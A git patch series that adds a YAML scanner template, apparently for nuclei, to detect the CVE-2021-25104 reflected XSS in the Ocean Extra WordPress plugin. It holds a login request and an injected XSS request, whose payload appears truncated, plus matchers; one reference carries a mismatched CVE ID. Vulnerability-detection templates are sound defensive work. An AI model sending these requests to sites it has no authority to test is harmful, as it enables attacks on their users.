From f9d72d9ebc55a1026808b52deb2b04063843e29e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 23 Sep 2022 09:08:10 +0530 Subject: [PATCH 1/2] Create CVE-2021-25104.yaml --- cves/2021/CVE-2021-25104.yaml | 49 +++++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 cves/2021/CVE-2021-25104.yaml diff --git a/cves/2021/CVE-2021-25104.yaml b/cves/2021/CVE-2021-25104.yaml new file mode 100644 index 0000000000..f7c7e46e78 --- /dev/null +++ b/cves/2021/CVE-2021-25104.yaml @@ -0,0 +1,49 @@ +id: CVE-2021-25104 + +info: + name: Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting + author: Akincibor + severity: medium + description: The plugin does not escape generated links which are then used when the OceanWP theme is active, leading to a Reflected Cross-Site Scripting issue. + remediation: Fixed in version 1.9.5 + reference: + - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25104 + - https://nvd.nist.gov/vuln/detail/CVE-2021-25104 + metadata: + verified: true + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/?step=demo&page=owp_setup&a"> HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'OceanWP' + - '>' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From c3bc4e144c814ea8826c6fa417c04a3a59ef6c79 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 23 Sep 2022 13:48:13 +0530 Subject: [PATCH 2/2] Update CVE-2021-25104.yaml --- cves/2021/CVE-2021-25104.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-25104.yaml b/cves/2021/CVE-2021-25104.yaml index f7c7e46e78..60acc8e159 100644 --- a/cves/2021/CVE-2021-25104.yaml +++ b/cves/2021/CVE-2021-25104.yaml @@ -8,11 +8,12 @@ info: remediation: Fixed in version 1.9.5 reference: - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558 + - https://wordpress.org/plugins/ocean-extra/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-25104 - https://nvd.nist.gov/vuln/detail/CVE-2021-25104 metadata: verified: true - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan + tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra requests: - raw: